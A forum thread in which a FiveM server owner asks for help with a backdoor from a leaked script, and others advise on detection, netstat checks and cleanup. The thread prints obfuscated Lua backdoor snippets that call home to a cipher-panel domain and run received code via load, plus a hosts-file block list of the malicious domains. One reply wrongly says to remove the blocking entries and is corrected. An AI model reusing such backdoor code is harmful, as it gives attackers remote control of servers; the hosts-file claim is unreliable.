What is this in script?

Dejv_Games · July 18, 2023, 7:38am

Well i think i downloaded a leaked script and when i ran it in server it made subafivem.exe in my qbcore framework and my AV catched it right away and putted it in quarantine and i deleted the resource too
I didnt noticed any unusual traffic and i deleted all the codes if this in scripts and it did not came back

Wetter42 · July 18, 2023, 3:56pm

It’s okay. it happens. I’d recommend coming up with ways to prevent this from happening again from ALL steps.

For example:

Attacker implanted malware on your machine
Machine’s filesystem changed in the fiveM server directories.
Callbacks to particular IP’s for them to command and control (pinging back your machine to make sure it’s still online).

Try to come up with solutions for each point.

Enforce an antivirus solution AND an EDR solution (endpoint detection and response)
Implement a file integrity monitor.
Consider blocking IP’s from known bad actor areas such as NK, china, nigeria, and russia.
Alternatively, you can operate your server on a whitelist basis in terms of network traffic. This will prevent non-allowed IP’s from being able to interact with your server (may need to consider blocking inbound AND outbound).
Don’t download fiveM scripts from untrusted servers
And lastly, most importantly, if you don’t know exactly what the code’s doing, don’t run it. Learn about it first, how it works, then implement. Because we all know bad scripts can come from bad websites, but they can also come from friends, and even good websites.

These are just examples, but this is the cat and mouse game of security. Taking the hit, and using it as a learning experience…

Wetter42 · July 18, 2023, 4:18pm

P.S. If you wanna know more about your specific flavor of malware, and how it works, check this out:

github.com

ericstolly/cipher/blob/main/chapters/chapter-1-payload.md

## Chapter 1 (Payload)
This chapter covers the payload code used in the malicious code to hire dubbed Cipher-Panel.

### Introduction
The payload for this malicious software is provided to users who pay for access that in turn allows them to generate the payload code. Using this payload code they can then download FiveM scripts, modify them to include the payload code, and then upload them to popular FiveM script leaking websites and communities or even used by script developers and merchants to target specific servers.

#### Original Code
```lua
    local Enchanced_Tabs = {
        Ench, Support, Host, Pairs,
        Realease, Callbacks, Source,
        Hosting, Event, PerformHttpRequest,
        assert, server, load, Spawn, materials
    }

    local random_char = {
        '68', '74', '74', '70', '73', '3a', '2f', '2f', '63', '69', '70', '68', '65', '72',
        '2d', '70', '61', '6e', '65', '6c', '2e', '6d', '65', '2f', '5f', '69', '2f'; '69',
        '3f', '74', '6f', '3d', '6c', '36', '54', '72', '32'
    }

This file has been truncated. show original

A lot of people tend to think that malware is “scary and unknown” but malware is just code created by bad people.

And similar to code, it can be created poorly, or really well.
In this case, someone reversed the obfuscated lua and did a writeup about it…

Read through it, and feel free to DM me if you have q’s! <3
Good luck out there!

Dejv_Games · July 27, 2023, 10:27am

i have two types of backdoor in my local and they still coming back after deleting them and i dont know what resources are doing that bcs the leaked scripts i deleted could it be that my pc is now infected for lifetime?

Wetter42 · July 27, 2023, 10:10pm

Not necessarily. It’ll only be infected until you can clean up the malicious code.

This can be done by doing two things:

Wiping your pc and starting fresh
Tracing the malware back to the source and removing it. Tracing it can vary from easy to hard depending on who wrote it…

I’d say take a look at your pc’s communication logs with netstat.
The bread and butter of command and control is that the attacker NEEDS to KNOW if they still have an active connection to a machine at any given moment…This means they will try to establish a continuous connection to your machine…

Run netstat -anob (if you’re on windows)
netstat -lntp (if you’re on linux)

This will show you WHICH processes are connecting out to WHICH IP addresses. Take note of all of the ones that seem suspicious (aka you don’t recognize them) INCLUDING the ones referencing that URL you translated using the hex decoder…

Figure out the files that are calling out to the internet and delete them (IF THEY’RE NOT CRITICAL SYSTEM FILES OR FIVEM FILES!)
If they are fiveM or system files, you’ll need to go in and figure out the section of code that’s been added / modified to be malicious.

If unsure, mention them here (if they’re fiveM files) - Otherwise, take it to an anti malware forum or something

But remember, if you don’t want to go this far, you can always just wipe your machine…

Some sources:
https://www.google.com/search?q=common+netstat+arguments

https://www.google.com/search?q=Detecting+command+and+control

Good luck

Dejv_Games · July 28, 2023, 4:00pm

Ive found in netstat -f Forgein Adresses like:
cipher-panel.me:55971 ESTABLISHED
cipher-panel.me:59744 TIME_WAIT
And many more does it mean something?

Dejv_Games · July 28, 2023, 4:02pm

and added this in C:/windows/system32/drivers/etc/hosts :

127.0.0.1 cipher-panel.me 
127.0.0.1 ciphercheats.com
127.0.0.1 keyx.club
127.0.0.1 dark-utilities.xyz

Dejv_Games · July 28, 2023, 4:19pm

But i think i know one think the virus that infected my server files was Trojan:win32/wacatac.h!ml under subafivem.exe
And my AV detected it and putted it in quarantine and i think that still infected the files so the malware was this but infected the files so it will still writing that code in it so if im not dumb enough i think i should be safe with all the things ive done or i hope bcs i dont wanna factory reset my pc i would lost so many things.

Dejv_Games · July 28, 2023, 4:20pm

Btw this is the second backdoor:
local DbCFaWJHTJCTdhsJMSzIKxMOwpLZmJMDoSzqJjjpupDOpogTwbyEgOqpYGDMDWqgCYYcsP = {“\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74”,“\x68\x65\x6c\x70\x43\x6f\x64\x65”,“\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72”,“\x61\x73\x73\x65\x72\x74”,“\x6c\x6f\x61\x64”,_G} DbCFaWJHTJCTdhsJMSzIKxMOwpLZmJMDoSzqJjjpupDOpogTwbyEgOqpYGDMDWqgCYYcsP[6]DbCFaWJHTJCTdhsJMSzIKxMOwpLZmJMDoSzqJjjpupDOpogTwbyEgOqpYGDMDWqgCYYcsP[1] DbCFaWJHTJCTdhsJMSzIKxMOwpLZmJMDoSzqJjjpupDOpogTwbyEgOqpYGDMDWqgCYYcsP[6][DbCFaWJHTJCTdhsJMSzIKxMOwpLZmJMDoSzqJjjpupDOpogTwbyEgOqpYGDMDWqgCYYcsP[3]](DbCFaWJHTJCTdhsJMSzIKxMOwpLZmJMDoSzqJjjpupDOpogTwbyEgOqpYGDMDWqgCYYcsP[2], function(OVZbggKLikOYHqgeoYOPmiLxOyaUajlEQFOZlDKMsteXGTiLErwkRQgwEsjYVvqzjWyzXm) DbCFaWJHTJCTdhsJMSzIKxMOwpLZmJMDoSzqJjjpupDOpogTwbyEgOqpYGDMDWqgCYYcsP[6]DbCFaWJHTJCTdhsJMSzIKxMOwpLZmJMDoSzqJjjpupDOpogTwbyEgOqpYGDMDWqgCYYcsP[4]() end)

And it came out with this : RegisterNetEventhelpCodeAddEventHandlerassertload

Wetter42 · July 28, 2023, 5:00pm

Yeah, definitely remove the 127.0.0.1 entries.

This particular IP address (if you don’t know) is networking language for “myself.” So make sure to remove those changes to system32/drivers/etc/hosts.

ALSO, please continue making notes of all the changes that you see…If the file reverts back, you gotta go deeper.

Also, the netstat is definitely showing that your machine is connecting OUT to somewhere.

Use netstat -anob to see what files they’re related to…
Delete them, or remove the bad parts (if they’re system files). Continue searching, but you may wanna take this to a malware analysis forum, or do some searching on “cipher-panel” malware. You may find others who learned how to clean it…

Lastly, I know you don’t want to reset your computer, but if you’re not 100% certain you’ve removed ALL of it, it may be the best option…

TheIndra · July 28, 2023, 5:09pm

The whole idea of doing that is so it doesn’t reach the cipher panel servers. Definitely do not remove them.

Resources tend to infect others, so you will have to install your server from scratch or go trough every file in your resources folder.

Dejv_Games · July 28, 2023, 5:17pm

I know that with VS code im going trough scripts and removing the codes etc.

Dejv_Games · July 28, 2023, 5:21pm

And i made some research on those malware cipher-panel and it infect in cfx-default (system)
so i deleted it and installed new (system) from github like in the cfx-default

Wetter42 · July 28, 2023, 5:31pm

Uhh I don’t think so…etc hosts (similar to linux) has to do with the specific machine’s need to translate dns entries.

So you’re saying Dejv_game’s windows computer should have a hostname of 127.0.0.1?

What’s gonna happen is that the malware’s going to try to reach out to cipher-panel.me over port n, and get rerouted back to itself due to THIS FILE. It has nothing to do with blocking.
You should remove those entries because the malware is routing back to the localhost as a part of its process…

Source

Wetter42 · July 28, 2023, 5:34pm

Of course, this is ASSUMING the malware wrote these entries and not @Dejv_Games

If it’s the latter, I apologize, and I was wrong…

Either way, that’s not good practice for stopping comms to known bad endpoints if this was made by @Dejv_Games.

Add an entry in windows firewall, and your router to stop traffic to those hosts if you feel the need;

Dejv_Games · July 28, 2023, 5:36pm

Ive read on internet that it should block the domains

Dejv_Games · July 28, 2023, 5:37pm

Ive wrote it in the host i read on the internet that it should block the domains

TheIndra · July 28, 2023, 5:37pm

127.0.0.1 is not the hostname, it routes cipher-panel.me to 127.0.0.1 so it’s unable to reach it.

This is a common way of blocking domain names.

AvarianKnight · July 28, 2023, 5:38pm

My dude, just say you don’t know how the host file works

First thing that pops up on google

Dejv_Games · July 28, 2023, 5:40pm

Hey hey for now i started again my server with all these things done and removed the codes and it seems like it for now did not cameback will update yall